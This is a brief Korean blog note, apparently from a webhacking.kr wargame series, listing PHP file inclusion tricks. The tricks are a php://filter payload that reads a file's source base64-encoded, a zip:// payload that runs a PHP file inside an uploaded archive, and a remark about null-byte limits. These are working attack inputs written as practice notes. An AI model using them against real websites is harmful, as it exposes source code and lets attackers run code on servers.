?pages=php://filter/convert.base64-encode/resource=hi.php
-> hi.php가 base64로 인코딩 되어 나온다
zip://a.zip%23a.php
-> zip파일 안에 있는 a.php를 실행한다
php 몇 버전 이상부터는 %00 바이트를 사용 할 수 없어서 php wrapper를 사용 할 수 없다고 한다
'webhacking.kr' 카테고리의 다른 글
| 60 (0) | 2015.05.10 |
|---|---|
| 54 (0) | 2015.05.06 |